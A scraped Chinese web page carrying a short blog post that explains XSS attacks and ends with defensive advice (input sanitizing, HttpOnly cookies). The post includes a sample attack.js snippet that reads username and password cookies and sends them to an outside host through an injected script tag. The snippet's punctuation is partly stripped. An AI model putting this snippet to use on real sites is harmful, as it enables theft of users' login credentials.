当前位置: 首页 > news >正文

影视网站建设平台wordpress静态化后404

影视网站建设平台,wordpress静态化后404,高端轻奢品牌,深圳网站建设价格多少title: XSS攻击 date: 2023-08-27 19:15:57 tags: [XSS, 网络安全] categories: 网络安全 今天学习了一个网络攻击的手段#xff0c;XSS攻击技术#xff0c;大家自建网站的朋友#xff0c;记得看看是否有此漏洞。 #x1f388; XSS 攻击 全称跨站脚本攻击 Cross Site Sc… title: XSS攻击 date: 2023-08-27 19:15:57 tags: [XSS, 网络安全] categories: 网络安全 今天学习了一个网络攻击的手段XSS攻击技术大家自建网站的朋友记得看看是否有此漏洞。 XSS 攻击 全称跨站脚本攻击 Cross Site Scripting。 为了与重叠样式表 CSS 进行区分所以换了另一个缩写名称 XSS。 XSS攻击者通过篡改网页注入恶意的 HTML 脚本一般是 javascript在用户浏览网页时控制用户浏览器进行恶意操作的一种攻击方式。 XSS 攻击经常使用在论坛博客等应用中。攻击者可以偷取用户Cookie、密码等重要数据进而伪造交易、盗取用户财产、窃取情报等私密信息。 就像上图如果用户在评论框中输入的并不是正常的文本而是一段 javascript 脚本而后台又没对该用户的数据进行处理直接存入数据库那么当其他用户过来访问该页面浏览器必然会执行这段脚本 当然这只是恶趣味而真正的黑客并不会仅仅满足这样的恶趣味可能更多的是想通过这些 注入脚本获取你的 个人信息 甚至是你的账号密码等信息。 由上图可知用户其实在评论的时候引入了一个第三方脚本在这个脚本中获取你浏览器的 cookie 信息并发送到指定的接口进行保存处理这样你的信息就已经泄露了: // attack.js 中的逻辑 var uname $.cookie(username); // 获取账号 var pwd $.cookie(password); // 获取密码// 发送请求 $(body).appendTo(script srchttp://autofelix.com/index.php?username${uname}password${pwd}/script); 在上面逻辑中脚本中获取了你的个人信息并将你的个人信息发送到后端 php 文件中进行处理保存这样你的个人信息就已经泄露了所以杜绝 xss攻击 在网络安全中非常的重要 所以后端永远不要相信用户提交的数据在接收用户提交的信息时候要进行 消毒处理 也就是过滤一些特殊的字符比如 javascript 脚本中的 进行转移 再进行存储这样就能有效的进行 xss 攻击的预防 另外如果 cookie 中设置了 HttpOnly 属性那么通过 js 脚本将无法读取到cookie 信息这样也能有效的防止 XSS 攻击窃取 cookie 内容 好记性不如烂笔头。
http://www.w-s-a.com/news/387614/

相关文章:

  • 网站建设 海豚弯专业的网站开发服务商
  • 那个网站有免费模板中国家装公司十大排名
  • 中铁建设集团有限公司门户网站余杭区建设规划局网站
  • 天猫网站建设的目标是什么做网站常见问题模板
  • 做php网站需要什么软件天津建设网官方网站
  • 南漳网站开发上海网站推广方法
  • 深圳seo网站大连旅顺房价
  • dede网站 地图什么做有没有做黑市网站
  • 做网站参考文献域名如何做网站
  • 怎么选择网站开发英文网站建设用途
  • 怎样做电子商务网站织梦生成手机网站
  • 公司网站建设选什么服务器网站里怎样添加关键词
  • 深圳建设局网站深业中城绿化项目营销型网站开发流程包括
  • 找销售的网站九江市建设项目服务中心
  • 东原ARC网站建设公司合肥seo网站推广外包
  • 那个网站是做房产中介的网站制作软件小学
  • 做网页怎么建站点视频解析网站
  • 做网站的系统设计网站设计论文前言
  • 做外贸网站多久更新汕头市建设局网站首页
  • 如何建设专业化的网站手机管理网站模板
  • 花生壳做网站如何用腾讯云做网站
  • 搭建集团网站开发app需要哪些软件
  • 网站建设 中企动力福州阀门wordpress 多说评论
  • php网站集成支付宝接口下载免费网络软件
  • 卡盟网站是怎么建设的用花生壳做网站速度可以吗
  • 杭州物联网前十名公司优秀seo平台
  • 网新中英企业网站管理系统wordpress 登录 缓存
  • wordpress模板建站教程wordpress添加广告位手机自适应
  • h5游戏平台入口优化是什么梗
  • 建设银行对公网站打不开网络推广活动方案主题和思路